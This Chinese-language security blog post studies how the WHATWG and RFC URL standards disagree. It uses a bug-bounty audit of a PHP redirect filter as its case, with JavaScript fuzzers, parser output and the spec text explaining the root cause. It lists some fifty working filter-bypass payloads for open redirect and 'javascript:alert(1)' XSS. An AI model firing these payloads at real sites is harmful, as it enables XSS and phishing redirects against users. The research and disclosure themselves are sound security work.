对WHATWG URL标准与RFC URL标准不一致性的研究

无在无不在 2023-03-17 21:57:29

2022年8月份在挖天融信SRC的时候,发现天融信的某个站点使用了redacted系统,于是便在github上下载了redacted的源码,审计了一下。

Source & Sink

通过审计发现,redacted系统在多处使用goto 参数来实现页面的重定向,比如说登录功能:

http://demo.redacted.com/login?goto=/

已经登录的用户如果访问该URL,后端将会读取goto参数的值,将其填充到twig模板中的div标签的自定义属性data-goto中:

{% block content %}
<div id="page-message-container" class="page-message-container" data-goto="{{ goto }}" data-duration={{ duration }}>
  <div class="page-message-panel">
    <div class="page-message-heading">
      <h2 class="page-message-title">{{ title|trans }}</h2>
    </div>
    <div class="page-message-body">{{ message|default('')|trans|raw }}</div>
  </div>
</div>
{% endblock %}

之后前端通过如下js代码读取data-goto属性的值,通过window.location.href实现页面的跳转:

function (e, t) {
        var n = $("#page-message-container"),
            r = n.data("goto"),
            o = n.data("duration");
        o > 0 && r && setTimeout((function () {
            window.location.href = r
        }), o)
 }

Sanitizer/Filter

redacted为了防止在页面重定向的过程中出现开放重定向漏洞(OR)和XSS ,专门在后端写了一个过滤器,对goto参数中的URL进行过滤:

    /**
     * 过滤URL.
     *
     * 如果url不属于非本站域名下的,则返回本站首页地址。
     *
     * @param $url string 待过滤的$url
     *
     * @return string
     */
    public function filterRedirectUrl($url)
    {
        $host = $this->get('request_stack')->getCurrentRequest()->getHost();
        $safeHosts = [$host];

        $parsedUrl = parse_url($url);
        $isUnsafeHost = isset($parsedUrl['host']) && !in_array($parsedUrl['host'], $safeHosts);
        $isInvalidUrl = isset($parsedUrl['scheme']) && !in_array($parsedUrl['scheme'], ['http', 'https']);

        if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
            $url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
        }

        return strip_tags($url);
    }

该 filter 的工作机制大致如下:
1. 拿到http请求报文中Host请求头,作为host白名单
2. 设置协议白名单: http,https
3. 使用PHP的URL解析器,来解析传入的URL,得到host部分和scheme部分
4. 如果host部分和scheme部分存在,就判断host部分是否属于host白名单,scheme部分是否属于scheme白名单
5. 否则就认为用户传入的是一个相对URL

绕过host检查

如何绕过filter的host检查呢?
我想到了之前用来绕过 SSRF filter 的一个payload :

https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/

这段payload 之所以可以成功,主要是利用了前后端URL解析器的不一致性:

  • PHP的parse_url认为URL的host部分是demo.redacted.com ,与http请求报文中Host请求一致,所以通过了检查,
  • 但是js的URL解析器却并不这样认为: js 的URL解析器会将 \ 规范化为 / ,所以原来的payload 经过解析后就变成了:
http://baidu.com/@demo.redacted.com/

因此前端认为URL的host部分是baidu.com 。

> new URL('http://baidu.com\\@demo.redacted.com/')
URL {origin: 'http://baidu.com', protocol: 'http:', username: '', password: '', host: 'baidu.com', }
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/@demo.redacted.com/"
origin: "http://baidu.com"
password: ""
pathname: "/@demo.redacted.com/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""

绕过scheme检查

仅仅绕过host检查,我们只能造成一个开放重定向漏洞,想要造成xss,还需要绕过后端的协议检查,如何绕过后端的协议检查呢?

我们可以尝试从如下思路来切入:因为漏洞的出现往往是由于程序的一些错误假设,所以我们可以尝试去寻找一下filter 有哪些错误的假设,然后尝试去打破它。

$parsedUrl = parse_url($url);
$isUnsafeHost = isset($parsedUrl['host']) && ! in_array($parsedUrl['host'], $safeHosts);
$isInvalidUrl = isset($parsedUrl['scheme']) && ! in_array($parsedUrl['scheme'], ['http', 'https']);

if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
    $url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
}
return strip_tags($url);

再次回看上面的那段filter代码,filter 假设:
1. 如果从URL中解析不到 host 和 scheme 部分,就一定是相对URL
2. "相对URL"一定就是安全的。

那么如果我们让parse_url返回false会怎么样?

false['host'] === NULL
false['scheme'] === NULL 

parse_url 会认为用户传入的URL没有host和scheme部分,所以是一个相对URL!而相对URL一定是安全的,可以直接返回给前端。

如何让parse_url返回false呢?

PHP URL parser 只是对RFC标准的实现,所以一旦传入的URL不符合RFC规范,那么parse_url就会返回false

比如一个经典的payload ,便可以用一种更简单的方式造成开放重定向:

https://demo.redacted.com/login?goto=http:///baidu.com 

RFC 1738 规定:层级结构的绝对URL 除去协议部分,后续部分必须以 // 开头

The scheme specific data start with a double slash "//" to indicate that it complies with the common Internet scheme syntax.

所以PHP 的URL解析器认为 http:///baidu.com 是一个非法的URL,因此直接返回了false,所以直接跳过了后续检查,返回给了前端。

但是前端的URL解析器并不这么认为,它会将http:///baidu.com 规范化为http://baidu.com :

> new URL('http:///baidu.com')
URL {origin: 'http://baidu.com', protocol: 'http:', username: '', password: '', host: 'baidu.com', }
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/"
origin: "http://baidu.com"
password: ""
pathname: "/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""

所以造成了OR 漏洞。

那么如果将http协议换成javascript 协议呢?RFC文档只是规定了层级URL必须包含//前缀,却没有明确说明: 如果非层级URL包含// 前缀,URL解析器应该如何处理。

javascript:alert(1)
javascript://alert(1)
mailto:happyhacking@qq.com 
mailto://happyhacking@qq.com 

于是我便想到了如下payload:

https://demo.redacted.com/login?goto=javascript:///%250dalert(1)

PHP 的URL解析器认为 javascript:///%250dalert(1) 是一个非法URL,直接返回了false,所以filter 跳过了协议检查,直接认为这就是一个安全的”相对URL“ 。

但是前端的URL解析器有自己的想法:

这行payload 反射到前端后是这样的:

window.location.href = 'javascript:///%0dalert(1)'

前端的URL解析器先进行URL解码,将%0d解码为\n ,解析到的协议名为javascript,因此切换为了js 解析器,js 解析器则认为// 是单行注释符,alert(1) 是换行后的下一行js代码。

因此造成了XSS

进一步的研究

能不能通过编写fuzzer来进一步搜索到js URL解析器和php URL解析器的更多不一致性呢?

http:{char}//localhost:80/xxxx

我们能否在 http://之间找到一个字符,将该字符填充到{char}位置之后,前端URL解析器仍然认为URL的host部分是localhost呢?

fuzzer如下:

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL('http:'+String.fromCodePoint(i)+'//localhost:80/xxxx')
  if(url['host'] == 'localhost' ){
    console.log(i+':URL encoded i : '+encodeURI(String.fromCodePoint(i)))
    log.push(i);
  }
  }catch(e){}
}
log

前端URL解析器的运行结果:

9:  URL encoded i : %09 debugger eval code:7:13-> \t http:%09//localhost  
10:  URL encoded i : %0A debugger eval code:7:13-> http:%0a//localhost
13:  URL encoded i : %0D debugger eval code:7:13-> http:%0d//localhost
47:  URL encoded i : / debugger eval code:7:13 -> http:///localhost
92:  URL encoded i : %5C \ -> http:\//localhost

那么PHP的URL解析器是如何解析的呢?

 ["http:%09//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "%09//localhost"
  }
  ["http:   //localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "   //localhost"
  }
  ["http:%0a//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "%0a//localhost"
  }
  ["http:\//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(12) "\//localhost"
  }
  ["http:///localhost"]=>
  bool(false)

由此可见,PHP URL解析器面对这些payload的时候,要么会认为http:之后的都是path部分,要么直接认为该URL是一个非法的URL,从而返回了false

换句话说,以下payload 也可以绕过redacted 的filter ,导致开放重定向:

https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com

http{char}://localhost:80/xxxx

我们能否在 http://之间找到一个字符,加入该字符后仍然可以让前端URL解析器认为URL的host部分是localhost且scheme部分是http呢?

fuzzer:

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL('http'+String.fromCodePoint(i)+'://localhost:80/xxxx')
  if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
    console.log('i: '+i+' URL encoded i : '+encodeURI(String.fromCodePoint(i)));
    console.log(url);
    log.push(i);
  }
  }catch(e){}
}
log

前端URL解析器的运行结果:

VM437:7 9:  URL encoded i : %09
VM437:7 10:  URL encoded i : %0A
VM437:7 13:  URL encoded i : %0D

这次只得到了三个字符,没有了 / 和 ,得到如下3个payload

http%09://baidu.com
http%0a://baidu.com
http%0d://baidu.com 

PHP的URL解析器是如何解析的呢?

  ["http%09://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%09://localhost:80/xxx"
  }
  ["http%0a://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%0a://localhost:80/xxx"
  }
  ["http%0d://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%0d://localhost:80/xxx"
  }

PHP 直接认为整个URL 都是path 部分,即认为整个URL就是一个相对URL

这样一来,同时绕过了filter的协议检查和host检查:

window.location.href='http\n://localhost:80/xxx' //成功!
window.location.href='javascript\n:alert(1)' //成功!
window.location.href='javascript\r:alert(1)' //成功!
window.location.href='javascript\t:alert(1)' //成功!

payload:

https://demo.redacted.com/login?goto=javascript%0d:alert(1) //成功!
https://demo.redacted.com/login?goto=javascript%0a:alert(1) //成功!
https://demo.redacted.com/login?goto=javascript%09:alert(1) //成功!
https://demo.redacted.com/login?goto=http%09://baidu.com //成功

{char}http://localhost:80/xxxx

能否在 http协议之前找到一个字符,填充进去后,仍然可以让前端URL解析器认为URL的host部分是localhost且scheme部分是http呢?

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL(String.fromCodePoint(i)+'http://localhost:80/xxxx')
  if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
    console.log(`i: ${i} ,URL encoded i : `+encodeURI(String.fromCodePoint(i))+' string begin:'+String.fromCodePoint(i)+'string end')
    log.push(i);
  }
  }catch(e){}
}
log
log.forEach(i=>{
    //console.log(encodeURI(String.fromCodePoint(i))+'http://localhost:80/xxxx')
    console.log(encodeURI(String.fromCodePoint(i))+'javascript:alert(1)')
})

生成了如下payload:

%00http://localhost:80/xxxx
%01http://localhost:80/xxxx
%02http://localhost:80/xxxx
%03http://localhost:80/xxxx
%04http://localhost:80/xxxx
%05http://localhost:80/xxxx
%06http://localhost:80/xxxx
%07http://localhost:80/xxxx
%08http://localhost:80/xxxx
%09http://localhost:80/xxxx
%0Ahttp://localhost:80/xxxx
%0Bhttp://localhost:80/xxxx
%0Chttp://localhost:80/xxxx
%0Dhttp://localhost:80/xxxx
%0Ehttp://localhost:80/xxxx
%0Fhttp://localhost:80/xxxx
%10http://localhost:80/xxxx
%11http://localhost:80/xxxx
%12http://localhost:80/xxxx
%13http://localhost:80/xxxx
%14http://localhost:80/xxxx
%15http://localhost:80/xxxx
%16http://localhost:80/xxxx
%17http://localhost:80/xxxx
%18http://localhost:80/xxxx
%19http://localhost:80/xxxx
%1Ahttp://localhost:80/xxxx
%1Bhttp://localhost:80/xxxx
%1Chttp://localhost:80/xxxx
%1Dhttp://localhost:80/xxxx
%1Ehttp://localhost:80/xxxx
%1Fhttp://localhost:80/xxxx
%20http://localhost:80/xxxx

将http协议替换为javascript协议:

%00javascript:alert(1)
%01javascript:alert(1)
%02javascript:alert(1)
%03javascript:alert(1)
%04javascript:alert(1)
%05javascript:alert(1)
%06javascript:alert(1)
%07javascript:alert(1)
%08javascript:alert(1)
%09javascript:alert(1)
%0Ajavascript:alert(1)
%0Bjavascript:alert(1)
%0Cjavascript:alert(1)
%0Djavascript:alert(1)
%0Ejavascript:alert(1)
%0Fjavascript:alert(1)
%10javascript:alert(1)
%11javascript:alert(1)
%12javascript:alert(1)
%13javascript:alert(1)
%14javascript:alert(1)
%15javascript:alert(1)
%16javascript:alert(1)
%17javascript:alert(1)
%18javascript:alert(1)
%19javascript:alert(1)
%1Ajavascript:alert(1)
%1Bjavascript:alert(1)
%1Cjavascript:alert(1)
%1Djavascript:alert(1)
%1Ejavascript:alert(1)
%1Fjavascript:alert(1)
%20javascript:alert(1)

PHP 的URL解析器是如何解析的呢?

  ["%00http://localhost:80/xxxx"]=>
  array(1) {
    ["path"]=>
    string(27) "%00http://localhost:80/xxxx"
  }
  ["%01http://localhost:80/xxxx"]=>
  array(1) {
    ["path"]=>
    string(27) "%01http://localhost:80/xxxx"
  }
  ["%1Djavascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "%1Djavascript:alert(1)"
  }
  ["%1Ejavascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "%1Ejavascript:alert(1)"
  }

PHP 的URL解析器认为整个URL就是一个相对URL

所以以下payload 都可以绕过redacted filter 的协议检查和host检查:

https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)

ht{char}tp://localhost:80/xxxx

让我们的想法再大胆一点,能否在http之间找到一种字符,让前端的URL解析器仍然认为URL的scheme部分是http且host部分是localhost

fuzz 程序如下:

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL('ht'+String.fromCodePoint(i)+'tp://localhost:80/xxxx')
  if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
    console.log('i: '+i+' URL encoded i : '+encodeURI(String.fromCodePoint(i)));
    console.log(url);
    log.push(i);
  }
  }catch(e){}
}
log

运行结果:

i: 9 URL encoded i : %09 debugger eval code:6:13
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
debugger eval code:7:13
i: 10 URL encoded i : %0A debugger eval code:6:13
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
debugger eval code:7:13
i: 13 URL encoded i : %0D debugger eval code:6:13
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
debugger eval code:7:13
Array(3) [ 9, 10, 13 ]

得到了如下payload

ht%0dtp://localhost
ht%0atp://localhost
ht%09tp://localhost
java%09script:alert(1)
java%0dscript:alert(1)
java%0ascript:alert(1)

那么PHP的URL解析器是如何处理这些畸形URL的呢?

  ["ht%0dtp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%0dtp://localhost"
  }
  ["ht%0atp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%0atp://localhost"
  }
  ["ht%09tp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%09tp://localhost"
  }
  ["java%09script:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%09script:alert(1)"
  }
  ["java%0dscript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%0dscript:alert(1)"
  }
  ["java%0ascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%0ascript:alert(1)"
  }

PHP 的URL解析器再一次地认为这些URL都是'规范的'相对URL,全部通过了redacted fitler的检查

https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)

实际上这三种字符可以放在scheme的任意位置:

https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

汇总

通过对javascript URL parser 与php URL parser不一致性的进一步研究,我一共找到了四十几种绕过redacted filter 的方法:

https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/
https://demo.redacted.com/login?goto=javascript:///%250dalert(1)
https://demo.redacted.com/login?goto=http:///www.baidu.com
https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com
https://demo.redacted.com/login?goto=javascript%0d:alert(1) 
https://demo.redacted.com/login?goto=javascript%0a:alert(1) 
https://demo.redacted.com/login?goto=javascript%09:alert(1) 
https://demo.redacted.com/login?goto=http%09://baidu.com 
https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)
https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

根本原因

为什么javascript URL parser与PHP URL parser之间存在这么大的不一致性?

因为这个世界上存在两种URL解析标准:RFC标准和WHATWG标准,WHATWG 组织在参考RFC标准的基础上,自己制定了一套标准: URL parsing

浏览器端javascript URL parser遵循了WHATWG标准,而PHP URL parser 遵循了RFC规范, Node.js 则同时提供了两种URL解析器,分别是 url.parsenew URL ,前者遵循RFC标准,后者遵循WHATWG标准。

WHATWG URL parsing 标准中规定:

  1. If input contains any leading or trailing C0 control or space, validation error.
  2. Remove any leading and trailing C0 control or space from input.

如果输入的URL开头和结尾有C0 控制符和space,则报一个 validtion error,然后删除输入中给所有开头和结尾的 C0 控制符 和 space ,其中 C0 control 的范围是: 0x00-0x1F ,space 的范围是 0x20 ,所以C0 control + space的范围是 0x00-0x20

什么叫 validation error 呢?

A validation error indicates a mismatch between input and valid input. User agents, especially conformance checkers, are encouraged to report them somewhere.A validation error does not mean that the parser terminates. Termination of a parser is always stated explicitly, e.g., through a return statement.

validtion error 只是表示输入和有效输入之间的不匹配,并不意味着解析终止,标准鼓励实现者在某处报告它。

这就是为什么以下这些payload可以工作:

https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
...
https://demo.redacted.com/login?goto=%20javascript:alert(1)

该标准还规定:

  1. If input contains any ASCII tab or newline, validation error.
  2. Remove all ASCII tab or newline from input.

那么ASCII tab or newline 范围有多大?

An ASCII tab or newline is U+0009 TAB, U+000A LF, or U+000D CR.

所以下面这些payload中%0d %0a %09都会被javascript URL parser给删除掉

https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

换句话说,%0d %0a %09 这三个字符可以放在URL的任何位置来对URL进行混淆,反正javascript URL parser 会删除掉这些字符,比如

new URL('http:/\x09/baidu.com') 

URL {
    origin: 'http://baidu.com', 
    protocol: 'http:', 
    username: '', 
    password: '', 
    host: 'baidu.com'
}

总结

世界上最糟糕的事莫过于对于同一事物有两套标准,如果标准存在不一致性,那么实现必然存在不一致性。不一致性导致的安全问题是隐蔽的,因为当你审计单个系统的时候,你会认为没有安全问题,但是当你把多个系统连接起来协同工作的时候,安全问题就会出现。这也说明了审计安全问题,需要从全局出发来统筹考虑,不能只是审计单个系统。

同时值得注意的是,凡是标准和规范没有明确规定或者模棱两可的地方,实现标准的开发者之间就会存在理解偏差,进而导致各种遵循标准实现的语言、库、框架、软件之间出现不一致性,这种不一致性便是创造新的攻击技术的沃土。

+----------------------------------------------------+
| 存在两套标准/标准的模棱两可/标准没有明确规定/标准的不同版本 |
+----------------------------------------------------+
                        |
                        v
              +-------------------+
              |  实现的不一致性     |
              +-------------------+
                        |
                        v
      +------------------------------------+
      |  各种bypass trick/新的攻击技术       |
      +------------------------------------+

参考资料

评论

无在无不在

blog: https://shangrui-hash.github.io/zh/

随机分类

MongoDB安全 文章:3 篇
漏洞分析 文章:212 篇
业务安全 文章:29 篇
企业安全 文章:40 篇
硬件与物联网 文章:40 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Yukong

🐮皮

H

HHHeey

好的,谢谢师傅的解答

Article_kelp

a类中的变量secret_class_var = "secret"是在merge

H

HHHeey

secret_var = 1 def test(): pass

H

hgsmonkey

tql!!!

目录